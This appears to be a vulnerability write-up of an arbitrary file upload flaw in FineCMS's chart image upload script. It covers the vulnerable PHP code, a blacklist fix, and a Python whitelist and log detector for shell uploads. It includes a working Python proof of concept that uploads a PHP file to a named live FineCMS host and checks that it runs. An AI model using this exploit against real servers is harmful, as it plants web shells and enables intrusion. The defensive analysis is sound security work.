FineCMS /dayrui/libraries/Chart/ofc_upload_image.php Arbitrary File Upload Vulnerability

    Contents

    1. Vulnerability description
    2. Vulnerability trigger conditions
    3. Affected scope
    4. Vulnerable code analysis
    5. Mitigation
    6. Offense and defense reflections

    1. Vulnerability description

    Relevant Link:

    http://www.wooyun.org/bugs/wooyun-2015-0105251


    2. Vulnerability trigger conditions

    0x1: POC

    #!/usr/bin/env python 
    # -*- coding: utf-8 -*- 
    #__author__ = '1c3z' 
    
    import urllib2 
    import random
    
    fileName = "shell" + str(random.randrange(1000,9999)) + ".php" 
    target = "http://v1.finecms.net/dayrui/libraries/Chart/ofc_upload_image.php" 
    
    def uploadShell():
        url = target + "?name=" + fileName
        req = urllib2.Request(url, headers={"Content-Type": "application/oct"}) 
        res = urllib2.urlopen(req, data="<?print(md5(0x22))?>")
        return res.read()
    
    def poc():
        res = uploadShell()
        if res.find("tmp-upload-images") == -1:
            print "Failed !"
            return
    
        print "upload Shell success"
        url = "http://v1.finecms.net/dayrui/libraries/tmp-upload-images/" + fileName
        md5 = urllib2.urlopen(url).read()
        if md5.find("e369853df766fa44e1ed0ff613f563bd") != -1:
            print "poc: " + url 
    
    poc()


    3. Affected scope
    4. Vulnerable code analysis

    /dayrui/libraries/Chart/ofc_upload_image.php

    $default_path = '../tmp-upload-images/';
    if (!file_exists($default_path)) mkdir($default_path, 0777, true);
    // The file name comes straight from the request; only the directory part is stripped.
    $destination = $default_path . basename( $_GET[ 'name' ] );
    echo 'Saving your image to: '. $destination;

    // The raw request body is written verbatim, with no extension or content check.
    $jfh = fopen($destination, 'w') or die("can't open file");
    fwrite($jfh, $HTTP_RAW_POST_DATA);
    fclose($jfh);

    The program performs no check or filtering of the uploaded file's extension or content.


    5. Mitigation

    /dayrui/libraries/Chart/ofc_upload_image.php

    $default_path = '../tmp-upload-images/';
    if (!file_exists($default_path))
        mkdir($default_path, 0777, true);

    $destination = $default_path . basename( $_GET[ 'name' ] );

    /* Added check: refuse any file name carrying a server-side script extension.
       The dot is escaped and the extension must be followed by the end of the
       name or by a non-alphanumeric character, so both "shell1234.php" and
       "shell.php.png" are rejected. (The original pattern left the dot
       unescaped and required trailing non-alphanumeric characters, so a plain
       "shell1234.php" was not matched.) */
    if (preg_match('#\.(php|pl|cgi|asp|aspx|jsp|php5|php4|php3|shtm|shtml)([^a-zA-Z0-9]|$)#i', trim($destination)))
    {
        die("你指定的文件名被系统禁止!");
    }

    echo 'Saving your image to: '. $destination;

    $jfh = fopen($destination, 'w') or die("can't open file");
    fwrite($jfh, $HTTP_RAW_POST_DATA);
    fclose($jfh);
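An extension blacklist like the one above has to enumerate every type the web server might execute, so a whitelist of the image types this endpoint actually stores is the safer shape. As an added example (not part of the original post or of FineCMS), the Python below implements that whitelist validation and a detector that flags requests to ofc_upload_image.php whose name parameter would fail it, run over constructed access-log lines; the allowed extension set and the combined-log format are assumptions.

```python
import posixpath
import re
from urllib.parse import parse_qs, urlsplit

# Assumption: the chart endpoint only ever needs to store rendered images.
ALLOWED_EXT = {"png", "jpg", "jpeg", "gif"}
STEM_RE = re.compile(r"[A-Za-z0-9_-]+")
# Assumed combined-log request field: "METHOD PATH HTTP/x.y" STATUS
LOG_RE = re.compile(r'"[A-Z]+ (?P<path>\S+) HTTP/[\d.]+" \d{3}')

def safe_upload_name(name):
    """Return a normalised file name, or None if it must be rejected.

    Rejects directory components, empty/dot names, stems outside
    [A-Za-z0-9_-], multiple extensions (shell.php.png) and any extension
    not in ALLOWED_EXT, so no script-extension blacklist has to be kept.
    """
    base = posixpath.basename(name.replace("\\", "/")).strip()
    if base != name or base in ("", ".", ".."):
        return None
    parts = base.split(".")
    if len(parts) != 2 or not STEM_RE.fullmatch(parts[0]):
        return None
    ext = parts[1].lower()
    return f"{parts[0]}.{ext}" if ext in ALLOWED_EXT else None

def flag_upload_requests(log_lines):
    """Return (line, reason) pairs for requests to ofc_upload_image.php
    whose name parameter would not pass safe_upload_name()."""
    hits = []
    for line in log_lines:
        m = LOG_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group("path"))
        if not url.path.endswith("/ofc_upload_image.php"):
            continue
        for n in parse_qs(url.query).get("name", []):  # parse_qs URL-decodes
            if safe_upload_name(n) is None:
                hits.append((line, f"rejected name {n!r}"))
    return hits

# Constructed sample log lines, not real traffic.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Aug/2015:10:00:01 +0800] "POST /dayrui/libraries/Chart/ofc_upload_image.php?name=shell4821.php HTTP/1.1" 200 57',
    '10.0.0.6 - - [01/Aug/2015:10:00:02 +0800] "POST /dayrui/libraries/Chart/ofc_upload_image.php?name=chart.png HTTP/1.1" 200 57',
    '10.0.0.7 - - [01/Aug/2015:10:00:03 +0800] "POST /dayrui/libraries/Chart/ofc_upload_image.php?name=shell.php.png HTTP/1.1" 200 57',
    '10.0.0.8 - - [01/Aug/2015:10:00:04 +0800] "GET /index.php HTTP/1.1" 200 1024',
]
```

Running flag_upload_requests(SAMPLE_LOG) returns the first and third lines; the chart.png upload and the unrelated GET are not flagged.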


    6. Offense and defense reflections

    Copyright (c) 2015 LittleHann All rights reserved

  Original source: https://www.cnblogs.com/LittleHann/p/4729648.html